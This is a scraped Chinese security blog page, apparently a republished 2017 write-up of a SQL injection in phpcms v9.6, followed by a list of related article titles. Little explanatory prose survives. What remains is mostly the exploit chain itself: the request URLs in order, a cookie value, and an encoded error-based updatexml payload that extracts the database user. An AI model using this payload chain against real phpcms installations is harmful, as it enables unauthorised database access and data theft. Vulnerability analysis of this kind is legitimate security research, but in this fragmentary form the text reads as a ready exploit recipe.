phpcmsv9.6注入漏洞詳細分析
本文講的是phpcms v9.6 注入漏洞詳細分析,搭建環境,我在本地搭建域名為www.joke33.com的測試環境。
/index.php?m=wap&c=index&a=init&siteid=1
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26
userid_flash=5ceb9go-1e01hkQc66J1WS7jTWMYriQh6lODXwUnLIiTZh_k
content-Type:application/x-www-form-urlencoded content-Length:53
/index.php?m=content&c=down&a_k=b2d2BO0WDcSf_BpiZ3UMBtiFx_4FRMv_1Mf35JQNq_ct__4JuWjwgdJjKmtTIZDn5WJBrexM-Nfg7S9J3QwB8U6vrFk3Fti5iJIkK6Gp6B6-ZSZsRKN4emXDpQAEeOD_IzG3kJ8B8ybdHIdytB3yjB7VI8fLm6fojfZOuCMD2iiERJE4aSBOTBM
parse_str("first=value&two=fooz");
&id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&
id=%*27 and updatexml(1,concat(1,(user())),1)#&m=1&f=haha&modelid=2&catid=7&
原文釋出時間為:2017年5月9日
本文作者:angle
本文來自雲棲社群合作伙伴嘶吼,瞭解相關資訊可以關注嘶吼網站。
相關文章
- PfSense命令注入漏洞分析
- Joomla 物件注入漏洞分析報告OOM物件
- JavaScript中依賴注入詳細解析JavaScript依賴注入
- JWT 詳細分析JWT
- 「轉」Laravel 依賴注入原理(詳細註釋)Laravel依賴注入
- DedeCMS最新通殺注入(buy_action.php)漏洞分析PHP
- JWT 超詳細分析JWT
- PE頭詳細分析
- Https詳細分析HTTP
- 安全開發之-漏洞詳細分類
- spring 詳細講解(ioc,依賴注入,aop)Spring依賴注入
- PE節表詳細分析
- CanOpen報文詳細分析
- XML實體注入漏洞XML
- NetGear多款路由器遠端命令注入漏洞分析(更新補丁分析)路由器
- 0day漏洞組合拳:詳細分析一款惡意PDF樣本
- appium的log詳細分析APP
- ORACLE AWR報告詳細分析Oracle
- Java ClassLoader 原理詳細分析Java
- WordPress < 3.6.1 PHP 物件注入漏洞PHP物件
- WordPress Core SQL 注入漏洞(CVE-2022–21661)分析SQL
- Linux ptrace詳細分析系列(二)Linux
- js中cookie的使用詳細分析JSCookie
- Android VectorDrawable SVG 命令詳細分析AndroidSVG
- C語言中的static 詳細分析C語言
- 詳細分析Java中斷機制Java
- EmbedPE 1.13 詳細分析和脫殼
- ModbusTCP協議報文詳細分析TCP協議
- RMI 反序列化詳細分析
- balance_dirty_pages_ratelimited詳細分析MIT
- Web 安全漏洞之 SQL 注入WebSQL
- 詳解Web應用安全系列(2)注入漏洞之XSS攻擊Web
- 詳細解讀:遠端執行緒注入DLL到PC版微信執行緒
- Flappy Bird 惡意程式詳細分析APP
- 黑暗幽靈(DCM)木馬詳細分析
- spdk nvme盤probe的流程詳細分析
- SiamBAN詳細分析,一看就懂!
- Python如何生成詞雲(詳細分析)Python